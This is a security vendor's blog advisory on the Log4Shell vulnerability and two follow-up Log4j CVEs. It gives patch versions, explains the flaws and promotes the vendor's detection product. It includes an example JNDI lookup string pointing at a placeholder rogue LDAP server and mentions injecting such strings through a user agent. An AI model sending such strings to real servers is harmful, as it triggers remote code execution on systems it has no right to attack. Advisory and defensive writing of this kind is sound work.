How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

• The vulnerability CVE-2021–44228, also known as Log4Shell, was announced on December 10, 2021, and was rated a 10 (out of 10) on the common vulnerability scoring system (CVSS) — a rating reserved for only the most severe vulnerabilities.
• Following the announcement of CVE-2021–4228, CyCraft issued an emergency advisory to all CyCraft Customers outlining mitigation best practices. This advisory was updated as additional related vulnerabilities came to light.
• Within hours, multiple attempts to exploit the vulnerability were observed in the wild by CyCraft and the wider intelligence community.
• CyCraft leverages autonomous behavioral detection systems and human-AI collaboration to protect our customers.
• CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested.
• CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.
• Organizations using Log4j2 are strongly encouraged to update the library to the latest Log4j2 version, currently version 2.17.0 at the time of this writing. Please see below for further mitigation best practices.

CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested. Our CyCraft MDR customers can monitor their internal network attack activities generated by attackers exploiting vulnerabilities as well as seek assistance from our AI analysts in inventorying which endpoints (Windows, Linux) or programs are at risk and assessing potential damage. CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.

‍

Suggested Patches and Updates

• Java 8 — upgrade Log4J to version 2.17.0: https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.17.0
• Java 7 — upgrade Log4J to version 2.12.2:
  https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.12.2

‍

Log4Shell Vulnerability Impact

‍Within days of the disclosure, there had been countless scans performed by attackers hunting for vulnerable systems and servers around the globe. The most well-known is the Java library called Log4j, which is a framework that provides logging and record management — developed and maintained by the Apache Foundation. Log4j is used in numerous commercial and open-source software products; the scope and extent of the impact are massive.

“[Log4Shell] is the largest and most critical single vulnerability in the past decade, [and may even be] the largest vulnerability in the history of modern computers.”
Amit Yoran, CEO of the network security company Tenable

‍

‍

Vulnerability CVE-2021–44228

CVE-2021–44228 can be exploited remotely by unauthenticated attackers to execute arbitrary code (Remote Code Execution, or RCE). For example, an attacker could send a message containing a java naming and directory inventory (JNDI) string, such as ${jndi:ldap://roguedapserver.com/a}, allowing the attacker to execute malicious commands on the host server when the string is logged. An attacker could likewise cause this string to be logged by a server via various other more subtle means, such as renaming their user agent with the string content while visiting a webpage or app, to achieve the same end result. Even websites and apps which do not directly accept user input are vulnerable to Log4Shell attacks.

When the target server receives this connection, it will save the WebLog and execute the malicious commands stored in the Log, then possibly load malicious Java files so that the attacker can directly control the system.

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

‍

Vulnerability CVE-2021–45046

After a busy week of updates, Log4j had been upgraded to Version 2.15. Although it patched vulnerability CVE-2021–44228, industry intelligence reports revealed that the Version 2.15 patch could be bypassed** in certain non-default configurations where JNDI Lookup is turned on. Hence, the CVSS rating of CVE-2021–45046 escalated from 3.7 to 9.0, going from a DoS vulnerability to RCE.

**This bypass uses an SSRF bypass technique introduced in this Black Hat talk.

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

‍

Vulnerability CVE-2021–45105

However, a DoS issue has appeared in Log4j 2.16 (CVE-2021–45105). Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups, allowing for attackers with control over Threat Context Map data to cause a DoS attack. This issue was fixed in Log4j 2.17.0 and 2.12.3.

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105

‍

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

CyCraft AIR hunts malicious behavior and known tactics and techniques of active and emerging threats rather than utilize block/allow signature-based lists or specific exploits. CyCraft AIR uniquely provides 24/7/365 coverage across your entire network via autonomous systems and human-AI collaboration.

CyCraft AI analysts leverage machine learning to detect, validate, and contain both known and unknown malware and threats. The CyCraft AIR sensor scans endpoints within your local network and in the cloud across Windows, Linux, and macOS environments. In addition to having already successfully detected and prevented attacks exploiting the Log4j2 vulnerability, CyCraft AIR has also proven to be highly effective in protecting both large and small organizations against advanced ransomware, cryptomining malware, Trojans, and botnets.

‍

‍

Above, CyCraft AIR successfully detected, validated, and contained malicious activity exploiting the Log4Shell vulnerability; thus preventing further malicious activity occurring on both the targeted endpoint and system. With each successful detection, validation, and containment, CyCraft AIR enhances its existing detection and response capabilities, providing the CyCraft Community at large with more effective and efficient coverage.

‍

Inventorying Log4j

Most asset inventory systems do not support JAR analysis, so it is difficult to inventory Log4j versions on a large scale.

JAR inventory is extremely difficult for current IT due to traditional IT software inventory tools installing components or system packages based on MSI. However, JAR files are Java Application-level packages (not a formal system registration component) that cannot be analyzed by asset software. In order to be able to comply with the software bill of materials (SBOM), the CyCraft MDR can analyze the Java Process on the system and can accurately assist customers in inventorying internal Log4j versions as well as more accurately calculate potential impact:

‍

‍

‍

• ‍https://logging.apache.org/log4j/2.x/security.html
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046‍
• https://xz.aliyun.com/t/10670

CyCraft Customers can prevent cyber intrusions from escalating into business-altering incidents. From endpoint to network, from investigation to blocking, from in-house to cloud, CyCraft AIR covers all aspects required to provide small, medium, and large organizations with the proactive, intelligent, and adaptable security solutions needed to defend from all manner of both existing and emerging security threats with real-time protection and visibility across the organization.

Whether it’s on Windows, Linux, or macOS, CyCraft AIR leverages autonomous behavioral detection systems and human-AI collaboration to protect the CyCraft Community from both known active threats and unknown emerging threats.